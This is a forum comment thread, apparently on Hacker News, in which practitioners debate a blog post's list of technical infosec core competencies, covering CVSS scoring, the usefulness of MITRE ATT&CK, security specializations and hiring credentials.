You also have to have a rebellious and slightly sly streak in you. This helps if you're going to do social engineering. You may have to learn to be more charismatic or learn superficial charm[0] and be able to play people's emotions.
Another thing: some people just fall into blackhat/whitehat/greyhat hacking naturally after learning that Everything is Broken[1].
> Once upon a time, a friend of mine accidentally took over thousands of computers. He had found a vulnerability in a piece of software and started playing with it. In the process, he figured out how to get total administration access over a network. He put it in a script, and ran it to see what would happen, then went to bed for about four hours. Next morning on the way to work he checked on it, and discovered he was now lord and master of about 50,000 computers. After nearly vomiting in fear he killed the whole thing and deleted all the files associated with it. In the end he said he threw the hard drive into a bonfire. I can’t tell you who he is because he doesn’t want to go to Federal prison, which is what could have happened if he’d told anyone that could do anything about the bug he’d found. Did that bug get fixed? Probably eventually, but not by my friend. This story isn’t extraordinary at all. Spend much time in the hacker and security scene, you’ll hear stories like this and worse.
Missing the most important one; being able to communicate security issues to non-security people. It doesn't matter that youre a super hacker if you cant explain why people should listen, or report your findings without the devs feeling like it's a personal attack.
I up voted but there is place for super technical people who are not good at explaining.
There is also a lot of place for people who understand stuff technically but are not exploiting boxes days in days out, that can talk and explain in more general terms lots of those things.
This actually helps with impostor syndrome. Not what I came here for, but the effect I notice. Since I've been doing the job, I figured I can pull it off mostly but... it often still feels like I barely know what I'm doing.
Reading this list, the topics are quite varied from network to filesystem to scripting, and yet I'm definitely confident in 47 of these 50 topics. Two of the remaining three I can do as specified, but not more deeply. For the final one, I already knew I'm lacking ($cloud vendor specific permission stuff) but I just don't find that area very motivating even if it looks like the established cloud vendors are here to stay. Feels rather dull to memorize vendor-specific words for established techniques and learn platform-specific attacks like the metadata service on AWS.
Anyway, it also seems like a good list (nice to say when you just said you know basically all of this? heh), because the topics are so varied yet it seems to aptly cover what I indeed use in daily work. Some points are more rare of course, like PMS logging for Wireshark (most of the time you do MITM rather than make the client log decryption keys), but still good to know of. I will probably refer to this next time someone asks me how to get into security! My answers to that question were previously quite basic, like just read up on attacks for the systems you're interested in or familiar with, or start with the OWASP top 10 if you don't know where to start. Then again, this list might also seems daunting if you need to ask the question of how to get started, hmm.
One thing to perhaps add would be subnetting / network isolation. It's not something you need in every assignment, but more often than you might think. Even if you do a simple web assignment and you find an SSRF through which you can obtain something important, being able to explain what isolation they are lacking and how it's supposed to be implemented without being able to bypass e.g. the VLAN tagging is helpful to your client (even if only the most high-security organisations care to properly implement it). The list mentions CIDRs, but knowing that there exists such a thing as IP ranges is of course not the whole story.
Also, the number of times the customer came with an isolated offline environment for either exams or sensitive systems... with a recursive DNS resolver... But I suppose #22 could cover that even if it doesn't specifically mention DNS tunneling.
I'm at bullet one of this list and immediately, entirely skeptical, since that bullet suggests that a common core competency of infosec people is evaluating a CVE by its CVSS score (which, we're told, has meaning relative to your own environment; that's where the art lies, presumably).
But CVSS is an industry-wide joke. It means almost literally nothing (a 9+ is usually, but not always, more severe than a 2). It's a Ouija board, computed by a mysterious calculator and adjusted by imperceptible nudges until the score matches the intuitions of the scorer.
> a 9+ is usually, but not always, more severe than a 2
which is exactly why learning to read these things (the full vector, I believe is what the author meant rather than just the resulting number) is useful when looking at a list of CVEs. Will it tell you the full story and everything you need to know? Of course not. Will it tell you what the impact for your business situation will be? Nope. Does it help you initially filter out the network-accessible no-privileges-required vulnerabilities that apply to your situation because you aren't local on the host and don't have credentials? Yes, that's where it's helpful.
My employer chose to use CVSS vectors to avoid discussions about whether something should be e.g. low/medium/high impact, and frankly I disagree with them. We still have discussions while it limits our ability to represent the likelihood of exploitation, the impact, or the resulting risk. So I'm fully on board that CVSS is very often not representative, especially the final score but sometimes also it just doesn't ask the right 'questions' (the parameters) to reflect what the problem or impact is. But I can still see what the author meant about reading a CVSS vector specified for a CVE.
Tell me more how a factual explanation of a software's exploitation techniques is a joke. I think you're drinking the repetitive koolaid that is frequently passed around on boards like this.
Title should be adjusted to the actual title of the blog post: (Technical) Infosec Core Competencies
InfoSec is a management practice. These technical skills are nice to have, but with the exception of #1 (understanding CVEs, CWEs, and CVSSs), you do not need the skills on this list in order to acquire and be productive in an InfoSec job. Someone with these technical skills is cut out to be a security researcher, part of a Red Team, working on the detection side of a SOC, or similar. Those are great and valuable roles, but not quite InfoSec. For an InfoSec job, give me someone who knows security management frameworks, can read security guidance, who can lead on processes we use to manage IT security, who can generate (and optionally build) security status reports, who gets the organizational chain of command for how IT security work gets done.
If you get decent at 3/4 of this list, you're in the top 5% of infosec professionals. Not that knowing all of these is bad, but you do not need to have all of these skills to be a well paid, in-demand infosec worker. It also depends on what subfield you're going in.
Are you going to be the only Infosec person at a small company? You need to know a lot more breadth than if you're going to be the email security gateway admin at a behemoth bank.
How do you prove you know these things to a potential employer?
A lot of businesses in this area are looking for credentials. A lot of competent people do not have credentials, and the credentials that do exist aren't very good anyway.
That goes beyond this one industry - the resume filter of HR departments is a tough gauntlet to get through. You'll have to start with intro level jobs, get certified by a decent org (AWS security, SANS, or maybe some "code academy" like cyber courses. And be able to talk about your home lab and interests.
While I agree with the bag of technical knowledge desirable for an infosec job, it's worth noting that many who hold such role have pivoted from another more or less technical field of work. A software developer who got familiar with networking, crypto, pentesting along the years makes a smooth transition within the same company, ramps up with the details in a few weeks and proudly wears the hat. Similarly, devops/cloud/site reliability enginners, and more commonly sysadmins, and security consultants have an easy time transitioning.
I like the objective of this article and most of what's in it but I think it leaves itself open to criticism.
I have doubts about the benefit of even implying a sense of objectivity to these so-called requirements because infosec is such a wide field and people from all over can and do never deal with a lot of these things.
A lot of folks in the industry would say that this lacks mention of LDAP, SAML, and other key protocols. Many folks would say that this is a very *NIX-centric list of utilities, or will work an entire career and never even see SPF or DNSSEC. Many pentesters would say that your understanding of security is only as good as your knowledge of how to break it, and insist on many more vulnerability types and tools as "core competencies" to this list. There's plenty of work being done in securing smart contracts and other cryptocurrency systems, so it's clearly opinion to insist on people avoiding it. Personally speaking, I think the insistence that there are tons of cryptocurrency people that don't know what cryptography is melodramatic and at some level not really possible. The idea of said people not knowing even what cryptography is while evangelizing about it is a contradiction. At this point most folks' beliefs on it are heavily correlated to personal politics, from people condemning or proclaiming it. That's a whole other topic, which is another reason why any binding opinions on it are not something I would include in an infosec core competencies list.
All this being said, I think getting to a consensus on what to learn is a good idea, and there are plenty of things that I personally agree with in this list, many or most of them even. The author is clear and up-front about it being based on his experience, but it appears pretty heavily so. It's still good, but I think this list would be better as a Git repository than a blog post.
I don't really think there are any lists like this that are "good", but I also don't know many people in the field that don't roll their eyes at ATT&CK these days.
When it comes to ATT&CK I have personally seen people go 50/50 on it, with most support coming from those in large enterprises. It's a pretty good resource for pentesting or red-team engagements, but probably could use less evangelizing.
I definitely haven't. Is it something you reference? Some of the technical aspects seem as fine as anything you could google, but the whole kill-chain thing always seemed a little overblown. I agree with your comment about it not benefiting practitioners as much.
Is your thesis that spending time analyzing and decomposing TTPs in the framework a waste of time? If it were, I would agree. My assertion is that it is not.
As far as embedding the TTPs in every marketing white paper out there, yeah, agree that’s dumb.
I don't love the term "TTP", but I'm not an IR person.
I don't think cataloguing things is intrinsically a waste of time.
I do think that a unified theory of how networks and computers are compromised is a pipe dream that doesn't reward the effort put into building or studying it.
Mostly, I think ATT&CK has done far more good for vendors as the basis for feature/function/benefit breakdowns than it has for practitioners.
You have one engineer that you send to enumerate the “Credential Dumping” TTP, read every reference, and model controls and detections. Mimikatz? Great, recompile the source code, modify the args, what’s left and how do you protect / detect? DCsync? How does it work? What events are triggered? How do you mitigate through defensive controls?
You have another that you send to read about cached credentials in a textbook.
You’re telling me the former does not come out ahead of the latter?
I don't know, maybe most of what you're saying here is that ATT&CK is useful if you're a Windows admin. I may be biased, since I work primarily in software security and vulnerability research, and not IT security.
> I don't know, [...] I work primarily in software security and vulnerability research, and not IT security. [52m ago, parent post]
Umm, so do you think IT security (I'd say pentests fall well within IT security, let me know if that's where you disagree) is within your competency or not?
IT security is a different specialization than any sense of the term "pentesting". IT security people engage pentesters, in the same sense that pentesters engage IT infrastructure in order to, like, send emails and stuff.
Interesting, I do penetration tests as my day job and would therefore say that means I'm working in IT security. But also I'm not a native english speaker so I might just be wrong. Just to make sure, what you call IT security is the securing of IT infrastructure, and what penetration testers do is, well, the testing thereof?
IT security is desktop and corporate infrastructure server security (file servers, email, directory), usually along with corporate network security (very big companies sometimes have distinct network security teams, but if you don't have that, IT security owns network security --- the wifi access points, the access routers, any weird 8021x-type stuff you're doing, etc).
As soon as you move into prod servers you're typically talking about cloud/infrasec people, who are distinct from IT security people. Infrasec: IAM; IT Security: Active Directory.
As soon as you move to actual code that the corporation writes/maintains, you're in appsec. If your IT security group owns appsec, you're not doing appsec.
No offense, but your comments are indicative of an epic chasm between the nature of attacks happening on a daily basis at enterprises everywhere and the work being done by many in Infosec, even those held in high regard.
None taken. I mean what I said. If you're an enterprise Windows IT security person, I'm prepared to accept that ATT&CK is important to you as a practitioner. You can tell me that attacks on corporate Windows infrastructure are the most important problem in information security; I won't litigate that.
I've been out of the infosec game (as a focused profession) for like 10 years or so now, but I looked up ATT&CK and I think perhaps you're used to working with clients with a certain level of sophistication who either outsource their assessments or know what the gold standard looks like. When I was doing pentests (for KPMG, not exactly known for their deep technical bench and 0-day research), it was very clear that things like ATT&CK (at the time, PCI DSS and its ilk) were key to letting unsophisticated companies either throw middle-grade talent at the problem of information security or provide a way for junior technicians to increase their skillset without taking time from the seniors (for better or worse). You mentioned vendors in a prior comment - obviously, ATT&CK is the kind of thing that lets consultancies bring a trough to feed from, but you can employ the same (useful) techniques internally in a company that's organized into service-oriented BUs.
This (my) view is orthogonal to Windows vs Everything Else. When you're working at a medium-cap manufacturer of widgets, software has already eaten your business, but you're not going to attract employees like taviso, right? So you give your people ATT&CK and it's better than nothing.
Maybe a simpler, clearer thing for me to have said is that studying ATT&CK is probably neither especially good career advice nor a good representation of the core competencies of a security engineer. Security engineering is multi-specialized, and significant and important specializations in security aren't well represented in ATT&CK at all.
But really all I wanted to chip in with here is that ATT&CK is also an eye-roll topic, even for people working in the specializations where ATT&CK applies. Not all the things in ATT&CK, many of which are important, but ATT&CK itself. I'm making a descriptive statement, not a normative one.
And here is where all of you are missing the point. The point is not that the framework is one of competencies. The framework LITERALLY describes attacks happening all day, every day, allowing one to conceptualize second order controls and build competency around engineering defenses. You're telling me it's not useful for a security engineer to learn how a first stage payload drops and pulls it's second stage post-exploitation kit, or what post-exploitation vs. pre-exploitation even means?
> an epic chasm between the nature of attacks happening on a daily basis at enterprises everywhere and the work being done by many in Infosec
Because they're not listening when we tell them to not roll their own crypto!
Or in a more serious tone: organisations often ignore best current practices, even after they spent a lot of money to have us look at their work and we told them what mistakes we found. Maybe we should indeed work more on making it easier to do things right, rather than just telling them how to do it right. It feels a bit like how you can at least distribute free needles to avoid infectious diseases when you can't stop people from being addicted to drugs.
Although if you look at pure research (not just advice not being followed), the gap indeed gets even bigger. Things like formal verification is great for academics but what would really help organisations is robust append-only, easy-to-restore backups to recover without paying after their stuff got encrypted again. But that's not sexy clever research, that's just some plumbing. While that sort of plumbing is not typically considered our job as security testers, it would be a solution that can make a real difference when looking at the attacks being done. (Criminals can still try blackmailing, but that seems to be much less lucrative on average, and good backups are also useful for accidental data destruction.)
Are you asking me to back up with data that ATT&CK is most frequently used by --- maybe almost exclusively used by --- corpsec Windows networking people?
Another thing: some people just fall into blackhat/whitehat/greyhat hacking naturally after learning that Everything is Broken[1].
[0] https://en.wikipedia.org/wiki/Superficial_charm
[1] https://medium.com/message/everything-is-broken-81e5f33a24e1
> Once upon a time, a friend of mine accidentally took over thousands of computers. He had found a vulnerability in a piece of software and started playing with it. In the process, he figured out how to get total administration access over a network. He put it in a script, and ran it to see what would happen, then went to bed for about four hours. Next morning on the way to work he checked on it, and discovered he was now lord and master of about 50,000 computers. After nearly vomiting in fear he killed the whole thing and deleted all the files associated with it. In the end he said he threw the hard drive into a bonfire. I can’t tell you who he is because he doesn’t want to go to Federal prison, which is what could have happened if he’d told anyone that could do anything about the bug he’d found. Did that bug get fixed? Probably eventually, but not by my friend. This story isn’t extraordinary at all. Spend much time in the hacker and security scene, you’ll hear stories like this and worse.